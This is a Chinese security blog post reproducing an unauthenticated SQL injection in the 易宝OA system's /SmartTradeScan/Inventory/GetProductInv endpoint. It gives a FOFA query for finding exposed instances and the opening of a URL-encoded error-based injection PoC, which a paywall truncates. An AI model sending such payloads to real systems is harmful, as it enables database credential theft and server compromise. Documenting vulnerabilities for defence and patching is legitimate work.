易宝OA GetProductInv SQL注入漏洞复现

已于 2024-04-05 14:49:45 修改
阅读量359 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-04-05 14:49:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/137400459
版权

0x01 产品简介

易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台,具有信息管理、 流程管理 、知识管理(档案和业务管理)、协同办公等多种功能。

0x02 漏洞概述

易宝OA /SmartTradeScan/Inventory/GetProductInv 接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息,用户名密码等凭据,进一步利用可获取服务器权限。

0x03 复现环境

FOFA:app="顶讯科技-易宝OA系统"

0x04 漏洞复现

PoC

GET /SmartTradeScan/Inventory/GetProductInv?boxNoName=1%27%20AND%201411%20IN%20(SELECT%20(CHAR(113)%2bCHAR(98)%2bCHAR(112)%2bCHAR(112)%2bCHAR(113)%2b(SELECT%20(CASE%20WHEN%20(1411=1411)%20THEN%20CHAR(49)%20ELSE%20CHAR
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
易宝php接口sdk
01-07
易宝支付,又称为YeePay,是中国领先的第三方支付平台,提供各种支付解决方案,包括在线支付、移动支付、扫码支付等。通过使用易宝PHP接口SDK,开发者可以方便地实现与易宝支付系统的交互,进行订单创建、支付处理、...
易宝支付sdk
11-07
易宝支付SDK是一种专为开发者设计的工具包,用于集成易宝支付平台的功能到自己的应用程序中。易宝支付是中国领先的第三方支付平台,提供多种在线支付解决方案,包括但不限于信用卡支付、借记卡支付、网银转账以及...
易宝支付实例(源码)
06-13
易宝支付简单来说就是一个第三方的支付端口,很多电子商务网站都开通了易宝支付,通过易宝支付可以使用易宝的会员账户支付,银行卡支付等等。不同于支付宝在于支付宝支付是先支付到支付宝账户,待消费者确认收货后,...
PHP第三方支付易宝支付最新sdk包,其中包含回调。
09-27
易宝支付作为国内知名的第三方支付平台,提供了一系列API和服务,帮助开发者轻松集成支付功能到自己的网站或应用程序中。本文将详细介绍PHP对接易宝支付的SDK,以及如何利用这个最新版本的SDK进行调用支付和处理回调...
易宝支付的最新接口文档
09-22
易宝支付,作为国内知名的第三方支付平台,提供了一系列的API接口供商家和开发者进行集成,以便实现在线支付、退款、查询交易状态等业务功能。本文将详细解析易宝支付的最新接口文档,以及如何利用提供的Java Demo...
构建稳固与安全的网络环境:从微软蓝屏事件中的教训学习
xingyu_qie的专栏
07-22 790
微软蓝屏”事件为我们提供了宝贵的教训和警示,即使是最大的科技公司也难以完全避免软件缺陷带来的灾难性后果。建设一个稳固和安全的网络环境需要多方面的努力:从有效的软件更新管理到强化的紧急响应能力,再到全员安全意识的培养和文化建设。只有综合运用技术、流程和人员培训,我们才能更好地应对未来可能出现的类似挑战,保护我们的数字基础设施和社会运行的稳定性与安全性。
企业如何保证公司内网安全
shunyou0526的博客
07-25 393
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1183
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 480
2024安全大模型技术与市场研究报告
CDGA|数据治理:安全如何贯穿数据供给、流通、使用全过程
vx15302782362的博客
07-25 361
因此,数据治理的重要性日益凸显,它不仅仅是对数据的简单管理,更是确保数据在供给、流通和使用全过程中安全、合规、高效的关键。通过制定统一的数据标准和数据字典,对来自不同渠道的数据进行清洗、转换和整合,确保数据的一致性和可用性。首先,数据的收集必须遵循合法、合规的原则,确保数据来源的可靠性和数据的准确性。其次,在数据共享和交换过程中,要制定严格的共享规则和交换协议,明确数据的使用范围、使用期限和使用权限。同时,要建立数据共享和交换的审计机制,对共享和交换的数据进行追溯和监控,确保数据的安全和合规使用。
人工智能:大语言模型提示注入攻击安全风险分析报告下载
cybtec的博客
07-25 1072
大语言模型提示注入攻击安全风险分析报告下载
大语言模型(LLM)安全测评基准V1.0 发布版下载
cybtec的博客
07-25 798
大语言模型(LLM)安全测评基准V1.0 发布版下载
LINUX操作系统安全
有莘不破的博客
07-23 855
LINUX操作系统安全基础内容
气膜建筑的逃生通道设计与安全保障—轻空间
Skansi的博客
07-25 453
确保这类建筑的安全性,尤其是逃生通道的设计,是保障人员生命安全的关键。通过合理设计逃生通道、加强日常维护和应急演练,可以有效提升气膜建筑的安全性,保障人员的生命安全。定期组织应急疏散演练,提高人员逃生意识和技能,确保紧急情况下有序撤离。根据建筑面积和使用人数设计足够的逃生通道,确保人员能够迅速疏散。逃生通道应有清晰的标识和足够的照明,确保在紧急情况下易于找到。材料和结构应具备良好的防火性能,确保通道畅通无阻。逃生通道的宽度和高度应满足疏散需求,避免拥堵。安装应急照明设备和紧急广播系统,引导人员撤离。
基于微信小程序的校园警务系统/校园安全管理系统/校园出入管理系统
weixin_47958760的博客
07-25 1200
伴随着社会以及科学技术的发展,小程序已经渗透在人们的身边,小程序慢慢的变成了人们的生活必不可少的一部分,紧接着网络飞速的发展,小程序这一名词已不陌生,越来越多的学校机构等都会定制一款属于自己个性化的小程序。 本毕业设计的内容是设计并且实现一个基于微信小程序的校园警务系统。采用MYSQL为数据库开发平台,SSM框架,校园警务系统的功能已基本实现,主要学生、校园活动、奖助学金、心理健康、入校申请、出校申请、调查问卷、思想政治等。
Docker 安全及日志管理(包含SSL证书)
weixin_62922268的博客
07-25 1886
目前常用的 Docker 版本都支持 Docker Daemon 管理宿主机 iptables 的,而且一旦启动进程加上 -p host_port:guest_port 的端口映射,Docker Daemon 会直接增加对应的 FORWARD Chain 并且 -j ACCEPT,而默认的 DROP 规则是在 INPUT 链做的,对 docker 没法限制,这就留下了很严重的安全隐患。3)客户端收到服务端证书后,会先用本地的CA证书校验证书的有效性,如果证书有效,则继续下一步操作,证书无效则显示告警信息。
如何安全的申请SSL证书
2401_86337938的博客
07-22 1420
DV级别的证书只验证域名所有权,OV级别证书除了验证域名所有权外还会验证单位组织信息,EV级别的证书除了验证域名所有权、单位组织信息外还会验证详细组织业务信息。一旦你的证书被批准,你会收到一个包含证书文件的邮件。最后,在选择SSL证书时,也要注意选择受信任的可信根CA颁布的SSL证书,可以先向JoySSL官网工作人员发送自己需要保护的域名,提交自己所需要的证书类型,注册时填写。首先选择在授权的JoySSL提供商或者是受信任的证书颁发机构选择适合的证书类型。详细的公司信息验证,用于银行、电商等敏感行业。
哪个邮箱最安全最好用啊
Zoho_Mail的博客
07-23 1278
Zoho企业邮箱,采用加密技术、反垃圾邮件和病毒保护,支持多因素认证,确保数据安全合规,同时提供易用性集成和移动应用。对公司,电子邮件可能带上商业计划、顾客信息、财务报表等保密信息,泄露可能导致竞争者掌握,危害企业的竞争优势与信誉。邮件炸弹进攻:很多垃圾短信的涌入可能导致邮箱服务器负荷,危害工作邮件的接收和推送,进而影响业务运作。登陆凭据、医疗记录、专利等敏感信息,一旦泄露,可能对个人或企业导致不可逆转的伤害。遵守国际安全标准和法规,如GDPR、HIPAA等,保证用户数据的合法处理和保护。
面试题:简单介绍一下快速失败和安全失败。简单介绍一下快速失败和安全失败和集合类的关联。
最新发布
weixin_73922932的博客
07-25 670
Java 中的快速失败(Fast-fail)和安全失败(Safe-fail)是两种异常处理机制,它们在处理程序运行过程中出现的错误或异常时有所不同。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值